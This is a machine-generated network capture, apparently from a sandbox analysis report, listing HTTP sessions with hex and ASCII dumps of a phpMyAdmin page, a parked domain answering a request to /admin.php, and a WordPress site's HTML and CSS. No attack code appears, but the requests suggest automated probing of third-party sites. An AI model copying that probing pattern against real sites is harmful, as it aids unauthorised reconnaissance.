phpMyAdmin_https=01pke3gn684j248r213vdkd9te; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
2024-02-20 23:26:15 UTC	491	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 31 35 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 69 25 32 42 68 6f 6e 6a 51 5a 31 45 31 67 44 4e 75 6e 61 6f 6b 4a 31 6e 39 4b 5a 6b 41 56 79 6b 33 51 58 6d 4f 75 4c 69 47 50 35 41 71 42 79 57 76 48 49 61 34 55 66 31 6f 68 6f 76 54 37 76 4b 6d 54 70 59 46 4a 32 54 53 77 68 57 78 4f 70 65 25 32 42 77 74 44 67 45 72 4f 5a 44 5a 39 6b 58 44 5a 4f 31 68 37 58 6a 51 Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:15 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i%2BhonjQZ1E1gDNunaokJ1n9KZkAVyk3QXmOuLiGP5AqByWvHIa4Uf1ohovT7vKmTpYFJ2TSwhWxOpe%2BwtDgErOZDZ9kXDZO1h7XjQ
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 34 37 64 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47db<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:15 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.6	64264	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	172	OUT	GET /admin.php HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_WduFNulcUak97539qsWITryFaFwDJKDnohSWoxGs+Os9hKq76tQvcLBP01K2Mr2l3KLaDCPaBc/unHWnOx8/YQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:15 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.6	64268	45.147.96.4	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	168	OUT	GET / HTTP/1.1 Host: www.glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	449	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Link: <https://www.glazing-bt.com/wp-json/>; rel="https://api.w.org/" Link: <https://www.glazing-bt.com/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json" Link: <https://www.glazing-bt.com/>; rel=shortlink Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:16 UTC	15935	IN	Data Raw: 66 65 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 Data Ascii: fedf<!DOCTYPE html><html lang="fr-FR" class="no-js" itemscope itemtype="https://schema.org/WebPage"><head><meta charset="UTF-8" />... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2f 69 6e 63 6c 75 64 65 73 2f 2e 2e 2f 63 73 73 2f 66 72 6f 6e 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 30 2e 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 73 5f Data Ascii: 7' type='text/css' media='all' /><link rel='stylesheet' id='cookie-notice-front-css' href='https://www.glazing-bt.com/wp-content/plugins/cookie-notice/includes/../css/front.min.css?ver=6.0.7' type='text/css' media='all' /><link rel='stylesheet' id='js_
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 74 74 6f 6d 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 3e 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b Data Ascii: ttom}#Top_bar .menu > li > ul.mfn-megamenu-bg > li{background:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li a{border:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li > ul{background:none!important;-webkit-box-shadow:0 0 0 0;-moz-box-shadow:0 0 0 0;
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 20 30 20 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 2c 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 63 75 73 74 6f 6d 2d 6c 6f 67 6f 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 6f 67 6f 2d 6e 6f 2d 73 74 69 63 6b 79 2d 70 61 64 64 69 6e 67 20 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 54 6f 70 Data Ascii: 0 20px;padding:0}#Top_bar.is-sticky #logo,#Top_bar.is-sticky .custom-logo-link{padding:5px 0!important;height:50px!important;line-height:50px!important}.logo-no-sticky-padding #Top_bar.is-sticky #logo{height:60px!important;line-height:60px!important}#Top
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 70 61 67 65 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 0d 0a 66 66 64 31 0d 0a 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 Data Ascii: > a,.menu-highlight #Top_bar #menu > ul > li.current-menu-parent > a,.menu-highlight #Top_bar #menu > ul > li.current-page-parent > a,.menu-highlight #Top_bar #menu >ffd1 ul > li.current-menu-ancestor > a,.menu-highlight #Top_bar #menu > ul > li.curre
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e Data Ascii: round-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: n
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 2d 6c 61 7a 79 6c 6f 61 64 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 32 36 31 22 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 72 65 73 65 61 75 2d 6e 61 74 69 6f 6e 61 6c 2e 70 6e 67 22 20 64 61 74 61 2d 6e 6f 2d 72 65 74 69 6e 61 3e 20 0a 09 09 09 09 09 09 09 3c 2f 72 73 2d 6c 61 79 65 72 3e 3c 21 2d 2d 0a 0a 09 09 09 09 09 09 09 2d 2d 3e 3c 72 73 2d 6c 61 79 65 72 0a 09 09 09 09 09 09 09 09 69 64 3d 22 73 6c 69 64 65 72 2d 32 2d 73 6c 69 64 65 2d 32 2d 6c 61 79 65 72 2d 31 34 22 20 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 74 79 70 65 3d 22 69 6d 61 67 65 22 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 72 73 70 Data Ascii: -lazyload" width="300" height="261" data-lazyload="//www.glazing-bt.com/wp-content/uploads/reseau-national.png" data-no-retina> </rs-layer>...--><rs-layerid="slider-2-slide-2-layer-14" data-type="image"data-rsp
